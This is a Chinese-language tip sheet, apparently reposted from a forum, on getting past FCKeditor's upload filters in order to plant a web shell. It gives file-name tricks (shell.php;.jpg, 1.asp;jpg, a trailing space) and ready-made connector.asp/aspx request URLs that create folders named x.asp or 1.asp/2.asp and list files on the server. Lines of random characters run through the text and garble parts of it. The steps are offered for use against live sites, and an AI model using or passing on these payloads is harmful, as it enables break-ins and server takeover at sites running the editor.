很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
# G5 t2 U6 P9 w4 @9 b" H$ H1 B$ O2 ]
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。# O* m* e4 x( s: S' m/ R# m g, M
$ h' d' Y8 E4 X L3 \7 @& f继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
7 F# S+ _/ T2 y2 e$ D6 R
5 |8 ^ }5 b+ c+ ]$ @" M3 z/ T突破建立文件夹:5 u; K; p8 m, u& S% U
& x1 `9 u; W" k) i* b, E1 Deditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp$ X$ z9 C8 [* J
% u/ W8 q; d! A# K h- [' U
参数:
: `1 ^4 [1 ~; Q C4 F& U8 g/ d8 z; c! E2 r% ?8 F2 |% c; D1 @
当前目录名:CurrentFolder=/qing.asp6 _$ c" U& D+ N4 w2 U
) p( A3 e7 E9 ~- b$ M5 @
新的目录名:NewFolderName=x.asp
* n$ m* S! Y3 W1 M. j4 d
$ i x+ @* X3 b7 p% e' \3 c其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……- r5 i# }9 ?% U0 L- k* q
8 d$ O! R% t6 V; k1 h1 G" B那么 x.asp 就已经建立生成了,此方法百试百灵!
1 r" D2 o- J0 T9 G; y" K7 `! n; m$ t a% K# h/ P
新建文件夹参数 x.asp,基本都能搞定。6 c& n) ]6 i" x6 b
" L( v/ E5 }: B( s5 T0 y( f下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建" T* ~( z- I# [! F( k: a( c5 b
) U, F+ }9 b/ h. {* V% ^
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
: R9 a( u+ E/ K) v! L5 B' r `) o5 H; {. A. L
获取文件列表
% B! w: w Y/ T7 f4 p; [" h. [ aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F4 w( }" D5 }( o& | Z
# A/ |9 n1 B0 R2 S9 ?. \) S" U& y2 v" S |